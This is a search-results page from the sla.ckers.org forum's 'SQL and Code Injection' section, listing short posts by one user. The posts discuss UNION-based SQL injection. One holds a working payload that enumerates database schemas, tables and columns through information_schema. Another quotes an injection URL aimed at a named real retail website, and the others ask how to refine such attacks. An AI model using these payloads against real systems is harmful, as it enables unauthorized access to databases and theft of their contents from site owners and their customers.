Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 1
Results 1 - 5 of 5
8 days ago
Freesia
Hello annen I appreciate your help. Thanks a lot!
Forum: SQL and Code Injection
9 days ago
Freesia
Hello ajkaro I have a sqli where the injection is on the second column of 6 so in case of this syntax: id=-82+union+SELECT 1,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ I don't know where to enter the other column numbers (3,4,
Forum: SQL and Code Injection
11 days ago
Freesia
Amazing Sorry to wake up an old topic, but I can't resist giving my kudos to you ajkaro. You solve anything! Bravo.
Forum: SQL and Code Injection
4 months ago
Freesia
Thank you blackrose, very nice trick! my question is how can I order the results, for example in your demo order by ID
Forum: SQL and Code Injection
10 months ago
Freesia
jammy99 Wrote: ------------------------------------------------------- > http://www.locksupermarket.co.uk/search-result.php > ?search=null%27%29%20UnIoN%20SeLect%201,2,3,4,5,6, > 7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, > 2,3,4,5--%20- That is a beauty, jammy99. Could you please explain this method? (1 to zero, 1 to zero etc) Thank you
Forum: SQL and Code Injection
Current Page: 1 of 1